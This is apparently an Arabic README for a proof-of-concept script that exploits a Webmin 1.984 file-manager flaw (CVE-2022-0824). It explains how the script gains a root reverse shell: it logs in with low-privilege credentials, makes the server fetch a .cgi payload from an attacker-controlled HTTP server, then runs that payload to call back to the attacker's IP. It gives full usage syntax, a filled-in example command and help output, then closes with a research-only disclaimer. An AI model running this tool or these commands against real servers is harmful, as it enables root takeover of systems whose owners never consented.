
Webmin <=1.984، CVE-2022-0824 شل عكسي بعد المصادقة — إثبات المفهوم
Webmin 1.984 وما دونه - استغلال صلاحيات مدير الملفات (CVE-2022-0824 وCVE-2022-0829)
يمكن للمستخدمين الأقل صلاحية في Webmin والذين ليست لديهم أي قيود على وحدة مدير الملفات الوصول إلى الملفات بصلاحيات الجذر (root)، إذا كانوا يستخدمون السمة الافتراضية Authentic. يجب ترقية جميع الأنظمة التي تحتوي على مستخدمي Webmin إضافيين غير موثوقين على الفور. لاحظ أن أنظمة Virtualmin غير متأثرة بهذه الثغرة، نظرًا للطريقة التي يتم بها تكوين مستخدمي Webmin من مالكي النطاقات.
المصدر: https://www.webmin.com/security.html
يستغل هذا الاستغلال ثغرة التحكم غير السليم في الوصول بعد المصادقة في مدير الملفات. يمكن لأي مهاجم مصادق بصلاحيات محدودة تنفيذ هذا الاستغلال. سيقوم بتنزيل ملف .cgi من خادم يتحكم فيه المهاجم عن بُعد وتعديل صلاحياته ليصبح قابلًا للتنفيذ بواسطة الجميع. وبمجرد القيام بذلك، سيقوم بتنفيذ ملف .cgi لإنشاء اتصال عكسي بالخادم الذي يتحكم فيه المهاجم بصلاحيات الجذر.
المرجع: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444
$~ python3 Webmin-revshell.py -h
usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]
Webmin CVE-2022-0824 Reverse Shell
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target full URL, https://www.webmin.local:10000
-c CREDENTIAL, --credential CREDENTIAL
Format, user:user123
-LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
Http server for serving payload, ex 192.168.5.120:8080
-L CALLBACK_IP, --callback_ip CALLBACK_IP
Callback IP to receive revshell
-P CALLBACK_PORT, --callback_port CALLBACK_PORT
Callback port to receive revshell
-V, --version show program's version number and exit
المضيف الهدف: https://192.168.5.118:10000
المضيف المهاجم: 192.168.5.120
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3
هذا السكريبت مخصص لتحليل الأمن والبحث فقط، وبالتالي لن أكون مسؤولًا إذا تم استخدامه في أنشطة غير مشروعة.